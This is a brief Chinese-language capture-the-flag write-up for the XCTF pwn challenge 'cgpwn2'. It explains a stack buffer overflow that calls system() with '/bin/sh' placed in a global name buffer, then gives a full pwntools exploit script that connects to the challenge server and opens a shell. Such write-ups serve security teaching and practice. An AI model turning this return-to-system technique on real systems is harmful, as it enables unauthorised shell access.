攻防世界(6):cgpwn2

日常查壳，只开了NX保护，没有Pie，name的位置不会变

ida逛该，发现了system函数

要是system执行的是'/bin/sh'多好啊，刚好给了一个name可以用于构造'/bin/sh'，后面的s用来覆盖就ebp就好了

exp直接payload

#!/usr/bin/env python
from pwn import *
p=remote("111.200.241.244",32471)
name_addr = 0x0804A080
sys_addr = 0x0804855A
payload = 'a' * (0x26 + 0x4) + p32(sys_addr) + p32(name_addr)
p.sendlineafter("please tell me your name\n", '/bin/sh')
p.sendlineafter("hello,you can leave some message here:\n",payload)
p.interactive()